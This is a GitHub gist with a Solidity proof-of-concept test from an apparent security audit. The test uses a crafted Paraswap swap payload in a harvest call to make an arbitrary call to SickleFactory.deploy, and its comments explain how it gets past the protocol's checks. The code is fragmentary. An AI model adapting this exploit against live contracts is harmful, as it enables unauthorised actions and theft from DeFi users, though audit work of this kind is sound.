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Last active April 26, 2024 06:44
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  • Save DrasticWatermelon/20fb2c38e1a90f38a8901d946ec8dd72 to your computer and use it in GitHub Desktop.
Save DrasticWatermelon/20fb2c38e1a90f38a8901d946ec8dd72 to your computer and use it in GitHub Desktop.
1. Add the test case to `test/strategies/PrismaConnector.t.sol`
2. Execute with `forge t --mt test_ArbitraryCallPOC -vvv`
At the end, the test asserts that the user's Sickle is now an owner of a Sickle
function test_ArbitraryCallPOC() external prank {
CurvePool[] memory curvePools = getCurvePools();
ParaswapExtraData memory payload = ParaswapExtraData({
target: address(ctx.factory),
data: abi.encodeCall(SickleFactory.deploy, (address(0xdeadbeef), bytes32(hex"abcdabcd")))
// 1. Create call params to target ParaswapConnector
SwapData[] memory swap = new SwapData[](1);
swap[0] = SwapData({
tokenIn: Mainnet.WETH, // AUDIT not important
amountIn: 1, // AUDIT needs to bypass 0 zero
minAmountOut: 0, // AUDIT not important
extraData: abi.encode(payload)
ZapModule.ZapOutData memory zapData = ZapModule.ZapOutData({
removeLiquidityData: RemoveLiquidityData({
router: address(0),
lpToken: address(0),
tokens: new address[](0),
lpAmountIn: 0,
minAmountsOut: new uint256[](0),
extraData: ""
swaps: swap, // TODO this is important for the exploit
tokenOut: ETH
// 2. Execute farmStrategy.harvest(pool, harvestData, "")
curvePools[0].pool, // AUDIT sets a random, registered, target to bypass connector existence check
// 3. Verify the Sickle is owner of a Sickle
address usersSickle = ctx.factory.sickles(sickleOwner);
assertTrue(usersSickle != address(0), "User isn't admin of a sickle");
address sicklesSickle = ctx.factory.sickles(usersSickle);
assertTrue(sicklesSickle != address(0), "Sickles isn't admin of a sickle");
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